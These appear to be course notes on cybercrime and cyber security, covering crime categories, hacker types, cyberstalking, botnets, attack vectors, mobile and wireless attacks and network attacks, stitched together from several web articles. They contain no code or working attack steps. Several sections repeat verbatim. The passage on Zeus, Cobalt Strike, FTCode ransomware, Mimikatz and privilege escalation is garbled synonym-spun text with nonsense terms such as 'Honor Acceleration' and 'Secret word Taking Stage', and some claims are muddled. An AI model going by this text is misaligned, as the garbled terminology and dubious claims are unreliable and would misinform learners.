CYBER SECURITY &FORENSICS

UNIT-I

Cybercrime or a computer-oriented crime is a crime that includes a computer

and a network. The computer may have been used in the execution of a crime
or it may be the target. Cybercrime is the use of a computer as a weapon for
committing crimes such as committing fraud, identity theft, or breaching privacy.
Cybercrime, especially through the Internet, has grown in importance as the
computer has become central to every field like commerce, entertainment, and
government. Cybercrime may endanger a person or a nation’s security and
financial health. Cybercrime encloses a wide range of activities, but these can
generally be divided into two categories:
1. Crimes that aim at computer networks or devices. These types of crimes
involve different threats (like virus, bugs etc.) and denial-of-service (DoS)
attacks.
2. Crimes that use computer networks to commit other criminal activities.
These types of crimes include cyber stalking, financial fraud or identity theft.

Classification of Cyber Crime:

1. Cyber Terrorism –
Cyber terrorism is the use of the computer and internet to perform violent
acts that result in loss of life. This may include different type of activities
either by software or hardware for threatening life of citizens.
In general, Cyber terrorism can be defined as an act of terrorism committed
through the use of cyberspace or computer resources.

2. Cyber Extortion –
Cyber extortion occurs when a website, e-mail server or computer system is
subjected to or threatened with repeated denial of service or other attacks by
malicious hackers. These hackers demand huge money in return for
assurance to stop the attacks and to offer protection.

3. Cyber Warfare –
Cyber warfare is the use or targeting in a battle space or warfare context of
computers, online control systems and networks. It involves both offensive
and defensive operations concerning to the threat of cyber attacks,
espionage and sabotage.

4. Internet Fraud –
Internet fraud is a type of fraud or deceit which makes use of the Internet
and could include hiding of information or providing incorrect information for
the purpose of deceiving victims for money or property. Internet fraud is not
considered a single, distinctive crime but covers a range of illegal and illicit
 actions that are committed in cyberspace.

5. Cyber Stalking –
This is a kind of online harassment wherein the victim is subjected to a
barrage of online messages and emails. In this case, these stalkers know
their victims and instead of offline stalking, they use the Internet to stalk.
However, if they notice that cyber stalking is not having the desired effect,
they begin offline stalking along with cyber stalking to make the victims’ lives
more miserable.

Challenges of Cyber Crime:

1. People are unaware of their cyber rights-

The Cybercrime usually happen with illiterate people around the world who
are unaware about their cyber rights implemented by the government of that
particular country.

2. Anonymity-
Those who Commit cyber crime are anonymous for us so we cannot do
anything to that person.

3. Less numbers of case registered-

Every country in the world faces the challenge of cyber crime and the rate of
cyber crime is increasing day by day because the people who even don’t
register a case of cyber crime and this is major challenge for us as well as
for authorities as well.

4. Mostly committed by well educated people-

Committing a cyber crime is not a cup of tea for every individual. The person
who commits cyber crime is a very technical person so he knows how to
commit the crime and not get caught by the authorities.

5. No harsh punishment-
In Cyber crime there is no harsh punishment in every cases. But there is
harsh punishment in some cases like when somebody commits cyber
terrorism in that case there is harsh punishment for that individual. But in
other cases there is no harsh punishment so this factor also gives
encouragement to that person who commits cyber crime.
Prevention of Cyber Crime:
Below are some points by means of which we can prevent cyber crime:
1. Use strong password –
Maintain different password and username combinations for each account
 and resist the temptation to write them down. Weak passwords can be easily
cracked using certain attacking methods like Brute force attack, Rainbow
table attack etc, So make them complex. That means combination of letters,
numbers and special characters.

2. Use trusted antivirus in devices –

Always use trustworthy and highly advanced antivirus software in mobile and
personal computers. This leads to the prevention of different virus attack on
devices.

3. Keep social media private –

Always keep your social media accounts data privacy only to your friends.
Also make sure only to make friends who are known to you.

4. Keep your device software updated –

Whenever you get the updates of the system software update it at the same
time because sometimes the previous version can be easily attacked.

5. Use secure network –

Public Wi-Fi are vulnerable. Avoid conducting financial or corporate
transactions on these networks.

6. Never open attachments in spam emails –

A computer get infected by malware attacks and other forms of cybercrime is
via email attachments in spam emails. Never open an attachment from a
sender you do not know.
7. Software should be updated – Operating system should be updated
regularly when it comes to internet security. This can become a potential
threat when cybercriminals exploit flaws in the system.

Defining cybercrime
The U.S. Department of Justice (DOJ) divides cybercrime into three
categories:

1. crimes in which the computing device is the target -- for example, to

gain network access;

2. crimes in which the computer is used as a weapon -- for example, to

launch a denial-of-service (DoS) attack; and
3. crimes in which the computer is used as an accessory to a crime -- for
example, using a computer to store illegally obtained data.
Cybercrime or a computer-oriented crime is a crime that includes a computer
and a network. The computer may have been used in the execution of a crime
or it may be the target. Cybercrime is the use of a computer as a weapon for
committing crimes such as committing fraud, identity theft, or breaching privacy.
Cybercrime, especially through the Internet, has grown in importance as the
computer has become central to every field like commerce, entertainment, and
government. Cybercrime may endanger a person or a nation’s security and
financial health. Cybercrime encloses a wide range of activities, but these can
generally be divided into two categories:
1. Crimes that aim at computer networks or devices. These types of crimes
involve different threats (like virus, bugs etc.) and denial-of-service (DoS)
attacks.
2. Crimes that use computer networks to commit other criminal activities.
These types of crimes include cyber stalking, financial fraud or identity theft.
Classification of Cyber Crime: Classification Of Cyber Crimes Cyber crimes can be
classified in to 4 major categories as the following:
(1) Cyber crime against Individual
(2) Cyber crime Against Property
(3) Cyber crime Against Organization
(4) Cyber crime Against Society

Read more at: https://www.lawyersclubindia.com/articles/classification-of-cybercrimes--

1484.asp

1. Cyber Terrorism –
Cyber terrorism is the use of the computer and internet to perform violent
acts that result in loss of life. This may include different type of activities
either by software or hardware for threatening life of citizens.
In general, Cyber terrorism can be defined as an act of terrorism committed
through the use of cyberspace or computer resources.

2. Cyber Extortion –
Cyber extortion occurs when a website, e-mail server or computer system is
subjected to or threatened with repeated denial of service or other attacks by
malicious hackers. These hackers demand huge money in return for
assurance to stop the attacks and to offer protection.

3. Cyber Warfare –
Cyber warfare is the use or targeting in a battle space or warfare context of
 computers, online control systems and networks. It involves both offensive
and defensive operations concerning to the threat of cyber attacks,
espionage and sabotage.

4. Internet Fraud –
Internet fraud is a type of fraud or deceit which makes use of the Internet
and could include hiding of information or providing incorrect information for
the purpose of deceiving victims for money or property. Internet fraud is not
considered a single, distinctive crime but covers a range of illegal and illicit
actions that are committed in cyberspace.

5. Cyber Stalking –
This is a kind of online harassment wherein the victim is subjected to a
barrage of online messages and emails. In this case, these stalkers know
their victims and instead of offline stalking, they use the Internet to stalk.
However, if they notice that cyber stalking is not having the desired effect,
they begin offline stalking along with cyber stalking to make the victims’ lives
more miserable.

Challenges of Cyber Crime:

1. People are unaware of their cyber rights-

The Cybercrime usually happen with illiterate people around the world who
are unaware about their cyber rights implemented by the government of that
particular country.

2. Anonymity-
Those who Commit cyber crime are anonymous for us so we cannot do
anything to that person.

3. Less numbers of case registered-

Every country in the world faces the challenge of cyber crime and the rate of
cyber crime is increasing day by day because the people who even don’t
register a case of cyber crime and this is major challenge for us as well as
for authorities as well.

4. Mostly committed by well educated people-

Committing a cyber crime is not a cup of tea for every individual. The person
who commits cyber crime is a very technical person so he knows how to
commit the crime and not get caught by the authorities.
5. No harsh punishment-
In Cyber crime there is no harsh punishment in every cases. But there is
harsh punishment in some cases like when somebody commits cyber
terrorism in that case there is harsh punishment for that individual. But in
other cases there is no harsh punishment so this factor also gives
encouragement to that person who commits cyber crime.
Prevention of Cyber Crime:
Below are some points by means of which we can prevent cyber crime:
1. Use strong password –
Maintain different password and username combinations for each account
and resist the temptation to write them down. Weak passwords can be easily
cracked using certain attacking methods like Brute force attack, Rainbow
table attack etc, So make them complex. That means combination of letters,
numbers and special characters.

2. Use trusted antivirus in devices –

Always use trustworthy and highly advanced antivirus software in mobile and
personal computers. This leads to the prevention of different virus attack on
devices.

3. Keep social media private –

Always keep your social media accounts data privacy only to your friends.
Also make sure only to make friends who are known to you.

4. Keep your device software updated –

Whenever you get the updates of the system software update it at the same
time because sometimes the previous version can be easily attacked.

5. Use secure network –

Public Wi-Fi are vulnerable. Avoid conducting financial or corporate
transactions on these networks.

6. Never open attachments in spam emails –

A computer get infected by malware attacks and other forms of cybercrime is
via email attachments in spam emails. Never open an attachment from a
sender you do not know.
7. Software should be updated – Operating system should be updated
regularly when it comes to internet security. This can become a potential
threat when cybercriminals exploit flaws in the system.

Cyber crime is taken very seriously by law enforcement. In the early long
periods of the cyber security world, the standard cyber criminals were
teenagers or hobbyists in operation from a home laptop, with attacks principally
restricted to pranks and malicious mischief. Today, the planet of the cyber
criminals has become a lot of dangerous. Attackers are individuals or teams
who attempt to exploit vulnerabilities for personal or financial gain.
Types of Cyber Criminals:

1. Hackers: The term hacker may refer to anyone with technical skills,
however, it typically refers to an individual who uses his or her skills to achieve
unauthorized access to systems or networks so as to commit crimes. The intent
of the burglary determines the classification of those attackers as white, grey, or
black hats. White hat attackers burgled networks or PC systems to get
weaknesses so as to boost the protection of those systems. The owners of the
system offer permission to perform the burglary, and they receive the results of
the take a look at. On the opposite hand, black hat attackers make the most of
any vulnerability for embezzled personal, monetary or political gain. Grey hat
attackers are somewhere between white and black hat attackers. Grey hat
attackers could notice a vulnerability and report it to the owners of the system if
that action coincides with their agenda.
 (a). White Hat Hackers – These hackers utilize their programming
aptitudes for a good and lawful reason. These hackers may perform network
penetration tests in an attempt to compromise networks to discover network
vulnerabilities. Security vulnerabilities are then reported to developers to fix
them and these hackers can also work together as a blue team. They always
use the limited amount of resources which are ethical and provided by the
company, they basically perform pentesting only to check the security of the
company from external sources.
 (b). Gray Hat Hackers – These hackers carry out violations and do
seemingly deceptive things however not for individual addition or to cause
harm. These hackers may disclose a vulnerability to the affected
organization after having compromised their network and they may exploit it .
 (c). Black Hat Hackers – These hackers are unethical criminals who
violate network security for personal gain. They misuse vulnerabilities to
bargain PC frameworks. theses hackers always exploit the information or
any data they got from the unethical pentesting of the network.
2. Organized Hackers: These criminals embody organizations of cyber
criminals, hacktivists, terrorists, and state-sponsored hackers. Cyber criminals
are typically teams of skilled criminals targeted on control, power, and wealth.
These criminals are extremely subtle and organized, and should even give
crime as a service. These attackers are usually profoundly prepared and well-
funded.
3. Internet stalkers: Internet stalkers are people who maliciously monitor the
web activity of their victims to acquire personal data. This type of cyber crime is
conducted through the use of social networking platforms and malware, that are
able to track an individual’s PC activity with little or no detection.
4. Disgruntled Employees: Disgruntled employees become hackers with a
particular motive and also commit cyber crimes. It is hard to believe that
dissatisfied employees can become such malicious hackers. In the previous
time, they had the only option of going on strike against employers. But with the
advancement of technology there is increased in work on computers and the
automation of processes, it is simple for disgruntled employees to do more
damage to their employers and organization by committing cyber crimes. The
attacks by such employees brings the entire system down. Please refer
for: Cyber Law (IT Law) in India

What is Cyberstalking?
Cyberstalking is a type of cybercrime that uses the internet and technology to harass or
stalk a person. It can be considered an extension of cyberbullying and in-person
stalking. However, it takes the form of text messages, e-mails, social media posts, and
other mediums and is often persistent, deliberate, and methodical.

Cyberstalking often starts with seemingly harmless interactions that go on to become

systematic in an annoying or frightening manner. Some even find the initial stage of
cyberstalking to be amusing and harmless, but it stops being fun anymore when the
interactions do not end even after the recipient has expressed their displeasure and
asked for the interaction to stop.

Cyberstalking Examples

Cyberstalkers use a variety of tactics and techniques to humiliate, harass, control, and
intimidate their victims. Many cyberstalkers are technologically savvy as well as creative
in their ways. Here are some examples of how Cyberstalking might take place:

 Posting offensive, suggestive, or rude comments online

 Sending threatening, lewd, or offensive emails or messages to the victim
 Joining the same groups and forums as the victim
  Releasing the victim’s confidential information online
 Tracking all online movements of the victim through tracking devices
 Using technology for blackmailing or threatening the victim
 Excessively tagging the victim in irrelevant posts
 Engaging with all online posts made by the victim

Types of Cyberstalking
Let us explore the various kinds of Cyberstalking that are prevalent:

Catfishing

The creation of fake profiles or copying of existing ones on social media to approach
victims.

Monitoring check-ins on social media

Keeping an eye on the activities of a victim on social media to accurately gauge their
behavior pattern.

Spying via Google Maps and Google Street View

Using Street View to spy on a victim and find their location from posts or photos on
social media.

Hijacking webcam

Webcams can be hijacked by introducing malware-infected files into the victim’s

computer.

CYBERCAFE AND CYBER CRIME

A recent survey conducted in one of the metropolitan cities in India reveals the following
facts,
  Pirated software(s) such as OS, browser, office automation software(s) (e.g.,
Microsoft Office) are installed in all the computers.
 Antivirus software is found to be not updated to the latest patch and/or antivirus
signature.
 Several cybercafes had installed the software called "Deep Freeze" for protecting
the computers from prospective malware attacks.
 Annual maintenance contract (AMC) found to be not in a place for servicing the
computers; hence, hard disks for all the computers are not formatted unless the
computer is down. Not having the AMC is a risk from cybercrime perspective
because a cybercriminal can install a Malicious Code on a computer and conduct
criminal activities without any interruption.
 Pornographic websites and other similar websites with indecent contents are not
blocked.
 Cybercafe owners have very less awareness about IT Security and IT
Governance.
 Government/ISPs/State Police (cyber cell wing) do not seem to provide IT
Governance guidelines to cybercafe owners.
 Cybercafe association or State Police (cyber cell wing) do not seem to conduct
periodic visits to cybercafes - one of the cybercafe owners whom we interviewed
expressed a view that the police will not visit a cybercafe unless criminal activity
is registered by fling an First Information Report (FIR). Cybercafe owners feel
that police either have a very little knowledge about the technical aspects.
involved in cybercrimes and/or about conceptual understanding of IT security.

There are thousands of cybercafes across India. In the event that a central agency
takes up the responsibility for monitoring cyber
BOTNETS

A botnet (short for “robot network”) is a network of computers infected

by malware that are under the control of a single attacking party,
known as the “bot-herder.” Each individual machine under the control
of the bot-herder is known as a bot

How Does a Botnet Work?

Now that you have a good understanding of what is a botnet, it’s time to dive deeper into
learning how a botnet works. Below are the steps that are carried out to initiate a botnet attack:

 Prepping the Botnet Army: The first step in creating a botnet is to infect as many connected
devices as possible, to ensure that there are enough bots to carry out the attack. It uses the
 computing power of the infected devices for tasks that remain hidden to the device owners.
However, the fraction of bandwidth taken from a single machine isn't sufficient, and hence the
Botnet combines millions of devices to carry out large-scale attacks. This way, it creates bots either
by exploiting security gaps in software or websites or phishing emails. They often deploy botnets
through a trojan horse virus.

 Establishing the connection: Once it hacks the device, as per the previous step, it infects it with a
specific malware that connects the device back to the central botnet server. This way, it connects all
the devices within the botnet network, and they are ready to execute the attack. A bot herder uses
command programming to drive the bot's actions.

 Launching the attack: Once infected, a bot allows access to admin-level operations like gathering
and stealing user data, reading and writing system data, monitoring user activities, performing DDoS
attacks, sending spam, launching brute force attacks, crypto mining, and so on.

Fig: Working of a Botnet

As seen in the above image, a bot herder initiates the attack by infecting several devices with
malicious code, which acts as the Botnet. In the next step, these devices take over and conduct
the final cyber attack. Therefore, even if you trace the cyberattack back in such a scenario, you
cannot trace the bot herder easily.

In the next segment of this tutorial on what is a botnet, you will dive deeper into understanding
botnets and look at the architecture of a botnet.
Botnet Architecture

A botnet architecture has developed over a while for improved working and slimmer chances of
getting traced. As seen previously, once it infects the desired number of devices, the botmaster
(bot herder) takes control of the bots using two different approaches.

 Client-Server Model

Fig: Client-server model

The client-server model is a traditional model that operates with the help of a command and
control (C&C) server and communication protocols like IRC. For example, IRC or Internet
Relay Chat sends automated commands to the infected bot devices.

Before engaging in a cyberattack, it frequently programs the bots to remain dormant and await
commands from the C&C server. When the bot herder issues a command to the server, it is then
relayed to the clients. Following this, the clients run the commands and report back to the bot
herder with the findings.

ATTACK VECTOR:
An attack vector is a pathway or method used by a hacker to
illegally access a network or computer in an attempt to exploit
system vulnerabilities. Hackers use numerous attack vectors to
launch attacks that take advantage of system weaknesses, cause
a data breach, or steal login credentials. What is an
attack vector?

An attack vector, or threat vector, is a way for attackers to enter a network or system.
Common attack vectors include social engineering attacks, credential theft, vulnerability
exploits, and insufficient protection against insider threats. A major part of information
security is closing off attack vectors whenever possible.

Suppose a security firm is tasked with guarding a rare painting that hangs in a museum.
There are a number of ways that a thief could enter and exit the museum — front doors,
back doors, elevators, and windows. A thief could enter the museum in some other way
too, perhaps by posing as a member of the museum's staff. All of these methods
represent attack vectors, and the security firm may try to eliminate them by placing
security guards at all doors, putting locks on windows, and regularly screening museum
staff to confirm their identity.
Similarly, digital systems all have areas attackers can use as entry points. Because
modern computing systems and application environments are so complex, closing off all
attack vectors is typically not possible. But strong security practices and safeguards can
eliminate most attack vectors, making it far more difficult for attackers to find and use
them.

What are some of the most common

attack vectors?
Phishing: Phishing involves stealing data, such as a user's password, that an attacker
can use to break into a network. Attackers gain access to this data by tricking the victim
into revealing it. Phishing remains one of the most commonly used attack vectors —
many ransomware attacks, for instance, start with a phishing campaign against the
victim organization.

Email attachments: One of the most common attack vectors, email attachments can
contain malicious code that executes after a user opens the file. In recent years, multiple
major ransomware attacks have used this threat vector, including Ryuk attacks.

Account takeover: Attackers can use a number of different methods to take over a
legitimate user's account. They can steal a user's credentials (username and password)
via phishing attack, brute force attack, or purchasing them on the underground market.
Attackers can also try to intercept and use a session cookie to impersonate the user to a
web application.

Lack of encryption: Unencrypted data can be viewed by anyone who has access to it. It
can be intercepted in transit between networks, as in an on-path attack, or simply
viewed inadvertently by an intermediary along the network path.

Insider threats: An insider threat is when a known and trusted user accesses and
distributes confidential data, or enables an attacker to do the same. Such occurrences
can be either intentional or accidental on the part of the user. External attackers can try
to create insider threats by contacting insiders directly and asking, bribing, tricking, or
threatening them into providing access. Sometimes malicious insiders act of their own
accord, out of dissatisfaction with their organization or for some other reason.

Vulnerability exploits: A vulnerability is a flaw in software or hardware — think of it as

being like a lock that does not work properly, enabling a thief who knows where the
faulty lock is to enter a secured building. When an attacker successfully uses a
vulnerability to enter a system, this is called a vulnerability "exploit." Applying the
software or hardware vendor's updates can fix most vulnerabilities. But some
vulnerabilities are "zero-day" vulnerabilities — unknown vulnerabilities for which there is
no known fix.

Browser-based attacks: To display webpages, Internet browsers load and execute code
they receive from remote servers. Attackers can inject malicious code into a website or
direct users to a fake website, tricking the browser into executing code that
downloads malware or otherwise compromises user devices. With cloud computing,
employees often access data and applications solely through their Internet browser,
making this threat vector of particular concern.

Application compromise: Instead of going after user accounts directly, an attacker may
aim to infect a trusted third-party application with malware. Or they could create a fake,
malicious application that users unknowingly download and install (a common attack
vector for mobile devices).

Open ports: A port is a virtual entryway into a device. Ports help computers and servers
associate network traffic with a given application or process. Ports that are not in use
should be closed. Attackers can send specially crafted messages to open ports to try to
compromise the system, just as a car thief might try opening doors to see if any are
unlocked.
How can an organization secure its
attack vectors?
There is no way to eliminate attack vectors altogether. But these approaches can help
stop both internal and external attacks.

 Good security practices: Many attacks succeed due to user error: users fall for
phishing attacks, open malicious email attachments, or provide access to an
unauthorized person. Training users to avoid these errors can go a long way toward
eliminating several major attack vectors.

 Encryption: Encrypting data in transit prevents it from being exposed to any

intermediary parties.

 Browser isolation: This technology moves the process of loading and executing
untrusted code to a location outside of an organization's secured network. Browser
isolation can even help eliminate the threat of zero-day attacks, at least in the
browser.

 Patching vulnerabilities: A large number of attacks occur because an organization

has not patched a vulnerability. Patching vulnerabilities and regularly updating
software and hardware vastly reduces the chances of a successful vulnerability
exploit.

 Secure access service edge (SASE): As reliance on the cloud has changed corporate
computing models, many organizations find their networking and security models
need to change as well. Secure access service edge (SASE) is one method of
integrating networking and security.

PROLIFERATIN OF MOBILE AND WIRELESS DIVICES

Proliferation (Growth) of Mobile and Wireless Devices

 A few years ago, the choice was between a wireless phone and a
simple PDA. Now the buyers have a choice between high-end PDAs
with integrated wireless modems and small phones with wireless
Web-browsing capabilities.
Security challenges posed by mobile devices
Believe it or not there are security risks when using a mobile device. We know,
it is surprising right, that your phone or tablet could be a possible threat to your
safety. When you consider all the potential threats that exist on the Internet and
the fact that most of today’s mobile devices are connecting to and through the
Internet with every function, I think it becomes easier to understand just how
vulnerable they are. While more of the threats are the same as those faced by
the average laptop or desktop user there are some unique to the mobile world.
Mobile phone security threats generally include application based, web-based,
network-based and physical threats.
1. Application based threat:
The most of application are downloadable and purposed the most common risk
for mobile users; most devices don’t do much on their own, and it is the
applications that make them so awesome and we all download apps. If it comes
to apps the risks run from bugs and basic security risks on the low end of the
scale all the way through malicious apps with no other purpose to commit cyber
crime.
 Malware
 Spyware
 Privacy
 Zero Day Vulnerabilities
2. Web based threat:
According to the nature of mobile use, the fact that we have our devices with us
everywhere we go and are connecting to the Internet while doing so, they face
the number of unique web-based threats as well as the run-of-the-mill threats of
general Internet use.
 Phishing Scams
 Social Engineering
 Drive By Downloads
 Operating System Flaws
3. Network-based threat:
Any mobile devices which typically support a minimum of three network
capabilities making them three-times vulnerable to network-based attack. And a
network often found on a mobile include cellular, WiFi and Bluetooth.
 Network exploits
 WiFi sniffing
 Cross-Platform Attacks
 BOYD
4. Physical Threats:
It is happened any time, unlikely a desktop sitting at your workstation, or even a
laptop in your bag, a mobile device is subject to a number of everyday physical
threats.
 Loss/Theft:
Loss or theft is the most unwanted physical threat to the security of your
mobile device. Any devices itself has value and can be sold on the
secondary market after all your information is stolen and sold.
Attacks on mobile /cellphones

Wireless and mobile devices have become ubiquitous in today’s society, and
with this increased usage comes the potential for security threats. Wireless and
mobile device attacks are a growing concern for individuals, businesses, and
governments.
Below are some of the most common types of Wireless and Mobile Device
Attacks:
SMiShing: Smishing become common now as smartphones are widely used.
SMiShing uses Short Message Service (SMS) to send fraud text messages or
links. The criminals cheat the user by calling. Victims may provide sensitive
information such as credit card information, account information, etc. Accessing
a website might result in the user unknowingly downloading malware that
infects the device.
War driving : War driving is a way used by attackers to find access points
wherever they can be. With the availability of free Wi-Fi connection, they can
drive around and obtain a very huge amount of information over a very short
period of time.
WEP attack: Wired Equivalent Privacy (WEP) is a security protocol that
attempted to provide a wireless local area network with the same level of
security as a wired LAN. Since physical security steps help to protect a wired
LAN, WEP attempts to provide similar protection for data transmitted over
WLAN with encryption. WEP uses a key for encryption. There is no provision for
key management with Wired Equivalent Privacy, so the number of people
sharing the key will continually grow. Since everyone is using the same key, the
criminal has access to a large amount of traffic for analytic attacks.
WPA attack: Wi-Fi Protected Access (WPA) and then WPA2 came out as
improved protocols to replace WEP. WPA2 does not have the same encryption
problems because an attacker cannot recover the key by noticing traffic. WPA2
is susceptible to attack because cyber criminals can analyze the packets going
between the access point and an authorized user.
Bluejacking: Bluejacking is used for sending unauthorized messages to
another Bluetooth device. Bluetooth is a high-speed but very short-range
wireless technology for exchanging data between desktop and mobile
computers and other devices.
Replay attacks: In a Replay attack an attacker spies on information being sent
between a sender and a receiver. Once the attacker has spied on the
information, he or she can intercept it and retransmit it again thus leading to
some delay in data transmission. It is also known as playback attack.
Bluesnarfing : It occurs when the attacker copies the victim’s information from
his device. An attacker can access information such as the user’s calendar,
contact list, e-mail and text messages without leaving any evidence of the
attack.
RF Jamming: Wireless signals are susceptible to electromagnetic interference
and radio-frequency interference. Radio frequency (RF) jamming distorts the
transmission of a satellite station so that the signal does not reach the receiving
station.

There are several types of attacks that target these devices, each
with its own advantages and disadvantages:

Wi-Fi Spoofing: Wi-Fi spoofing involves setting up a fake wireless access point
to trick users into connecting to it instead of the legitimate network. This attack
can be used to steal sensitive information such as usernames, passwords, and
credit card numbers. One advantage of this attack is that it is relatively easy to
carry out, and the attacker does not need sophisticated tools or skills. However,
it can be easily detected if users are aware of the legitimate network’s name
and other details.
Packet Sniffing: Packet sniffing involves intercepting and analyzing the data
packets that are transmitted over a wireless network. This attack can be used to
capture sensitive information such as email messages, instant messages, and
web traffic. One advantage of this attack is that it can be carried out without the
user’s knowledge. However, the attacker needs to be in close proximity to the
victim and must have the technical skills and tools to intercept and analyze the
data.
Bluejacking: Bluejacking involves sending unsolicited messages to Bluetooth-
enabled devices. This attack can be used to send spam, phishing messages, or
malware to the victim’s device. One advantage of this attack is that it does not
require a network connection, and the attacker can be located anywhere within
range of the victim’s Bluetooth signal. However, it requires the attacker to have
the victim’s Bluetooth device’s address and is limited to devices that have
Bluetooth capabilities.
SMS Spoofing: SMS spoofing involves sending text messages that appear to
come from a trusted source, such as a bank or a government agency. This
attack can be used to trick users into revealing sensitive information or
downloading malware. One advantage of this attack is that it can be carried out
without the user’s knowledge. However, it requires the attacker to have the
victim’s phone number, and it can be easily detected if users are aware of the
legitimate source of the message.
Malware: Malware is software designed to infect a device and steal or damage
data. Malware can be distributed through email attachments, software
downloads, or malicious websites. One advantage of this attack is that it can be
carried out remotely, without the attacker needing to be physically close to the
victim. However, it requires the attacker to have a way to deliver the malware to
the victim’s device, such as through a phishing email or a fake website.

NETWORK AND COMPUTER ATTACKS

Many people rely on the Internet for many of their professional, social and
personal activities. But there are also people who attempt to damage our
Internet-connected computers, violate our privacy and render inoperable the
Internet services.
Given the frequency and variety of existing attacks as well as the threat of new
and more destructive future attacks, network security has become a central
topic in the field of computer networking.
How are computer networks vulnerable? What are some of the more
prevalent types of attacks today?
Malware – short for malicious software which is specifically designed to disrupt,
damage, or gain authorized access to a computer system. Much of the malware
out there today is self-replicating: once it infects one host, from that host it
seeks entry into other hosts over the Internet, and from the newly infected
hosts, it seeks entry into yet more hosts. In this manner, self-replicating
malware can spread exponentially fast.
Virus – A malware which requires some form of user’s interaction to infect the
user’s device. The classic example is an e-mail attachment containing malicious
executable code. If a user receives and opens such an attachment, the user
inadvertently runs the malware on the device.
Worm – A malware which can enter a device without any explicit user
interaction. For example, a user may be running a vulnerable network
application to which an attacker can send malware. In some cases, without any
user intervention, the application may accept the malware from the Internet and
run it, creating a worm.
Botnet – A network of private computers infected with malicious software and
controlled as a group without the owners’ knowledge, e.g. to send spam.
DoS (Denial of Service) – A DoS attack renders a network, host, or other
pieces of infrastructure unusable by legitimate users. Most Internet DoS attacks
fall into one of three categories :
• Vulnerability attack: This involves sending a few well-crafted messages to a
vulnerable application or operating system running on a targeted host. If the
right sequence of packets is sent to a vulnerable application or operating
system, the service can stop or, worse, the host can crash.
• Bandwidth flooding: The attacker sends a deluge of packets to the targeted
host—so many packets that the target’s access link becomes clogged,
preventing legitimate packets from reaching the server.
• Connection flooding: The attacker establishes a large number of half-open or
fully open TCP connections at the target host. The host can become so bogged
down with these bogus connections that it stops accepting legitimate
connections.
DDoS (Distributed DoS) – DDoS is a type of DOS attack where multiple
compromised systems, are used to target a single system causing a Denial of
Service (DoS) attack. DDoS attacks leveraging botnets with thousands of
comprised hosts are a common occurrence today. DDoS attacks are much
harder to detect and defend against than a DoS attack from a single host.
Packet sniffer – A passive receiver that records a copy of every packet that
flies by is called a packet sniffer. By placing a passive receiver in the vicinity of
the wireless transmitter, that receiver can obtain a copy of every packet that is
transmitted! These packets can contain all kinds of sensitive information,
including passwords, social security numbers, trade secrets, and private
personal messages. some of the best defenses against packet sniffing involve
cryptography.
IP Spoofing – The ability to inject packets into the Internet with a false source
address is known as IP spoofing, and is but one of many ways in which one
user can masquerade as another user. To solve this problem, we will need end-
point authentication, that is, a mechanism that will allow us to determine with
certainty if a message originates from where we think it does.
Man-in-the-Middle Attack – As the name indicates, a man-in-the-middle attack
occurs when someone between you and the person with whom you are
communicating is actively monitoring, capturing, and controlling your
communication transparently. For example, the attacker can re-route a data
exchange. When computers are communicating at low levels of the network
layer, the computers might not be able to determine with whom they are
exchanging data.
Compromised-Key Attack – A key is a secret code or number necessary to
interpret secured information. Although obtaining a key is a difficult and
resource-intensive process for an attacker, it is possible. After an attacker
obtains a key, that key is referred to as a compromised key. An attacker uses
the compromised key to gain access to a secured communication without the
sender or receiver being aware of the attack.
Phishing – The fraudulent practice of sending emails purporting to be from
reputable companies in order to induce individuals to reveal personal
information, such as passwords and credit card numbers.
DNS spoofing – Also referred to as DNS cache poisoning, is a form of
computer security hacking in which corrupt Domain Name System data is
introduced into the DNS resolver’s cache, causing the name server to return an
incorrect IP address.
Rootkit – Rootkits are stealthy packages designed to benefit administrative
rights and get the right of entry to a community tool. Once installed, hackers
have complete and unrestricted get right of entry to the tool and can, therefore,
execute any movement including spying on customers or stealing exclusive
data with no hindrance.
Find out about Organization Assaults:
There’s something else to find out about network assaults.
Zeus Malware: Variations, Techniques and History:
Zeus, otherwise called Zbot, is a malware bundle that utilizes a client/server
model. Programmers utilize the Zeus malware to make gigantic botnets. The
primary reason for Zeus is to assist programmers with acquiring unapproved
admittance to monetary frameworks by taking accreditations, banking data and
monetary information. The penetrated information is then sent back to the
assailants through the Zeus Order and Control (C&C) server.
Zeus has tainted north of 3 million PCs in the USA, and has compromised
significant associations like NASA and the Bank of America.
Cobalt Strike: White Cap Programmer Force to be reckoned with in Some
unacceptable Hands
Cobalt Strike is a business infiltration testing instrument. This instrument
empowers security analyzers admittance to a huge assortment of assault
capacities. You can utilize Cobalt Strike to execute stick phishing and gain
unapproved admittance to frameworks. It can likewise recreate an assortment
of malware and other high level danger strategies.
While Cobalt Strike is a real instrument utilized by moral programmers, some
digital hoodlums get the preliminary rendition and break its product insurance,
or even get admittance to a business duplicate of the product.
FTCode Ransomware: Dispersion, Life systems and Assurance
FTCode is a kind of ransomware, intended to encode information and power
casualties to pay a payoff for a decoding key. The code is written in PowerShell,
implying that it can scramble records on a Windows gadget without
downloading some other parts. FTCode loads its executable code just into
memory, without saving it to plate, to forestall location by antivirus. The FTCode
ransomware is conveyed through spam messages containing a contaminated
Word layout in Italian.
Mimikatz: World’s Most Perilous Secret word Taking Stage
Mimikatz is an open-source instrument at first created by moral programmer
Benjamin Delpy, to exhibit a blemish in Microsoft’s confirmation conventions.
.As such, the apparatus takes passwords. It is conveyed on Windows and
empowers clients to extricate Kerberos tickets and other validation tokens from
the machine. A portion of the more significant assaults worked with by Mimikatz
incorporate Pass-the-Hash, Kerberos Brilliant Ticket, Pass the Key, and Pass-
the-Ticket.
Understand more: Mimikatz: World’s Most Risky Secret key Taking Stage
Grasping Honor Acceleration and 5 Normal Assault Strategies
Honor heightening is a typical technique for acquiring unapproved admittance to
frameworks. Programmers start honor heightening by tracking down weak
focuses in an association’s guards and accessing a framework. Typically, the
primary place of infiltration won’t concede aggressors with the fundamental
degree of access or information. They will go on with honor heightening to
acquire authorizations or get admittance to extra, more delicate frameworks.
This article is contributed by Achiv Chauhan. If you like GeeksforGeeks and
would like to contribute, you can also write an article
using write.geeksforgeeks.org or mail your article to review-
team@geeksforgeeks.org. See your article appearing on the GeeksforGeeks
main page and help other Geeks. Please write comments if you find anything
incorrect, or you want to share more information about the topic discussed
above.

UNIT – II

UNIT - II
Proxy server refers to a server that acts as an intermediary between the request
made by clients, and a particular server for some services or requests for some
resources. There are different types of proxy servers available that are put into
use according to the purpose of a request made by the clients to the servers.
The basic purpose of Proxy servers is to protect the direct connection of
Internet clients and internet resources. The proxy server also prevents the
identification of the client’s IP address when the client makes any request is
made to any other servers.
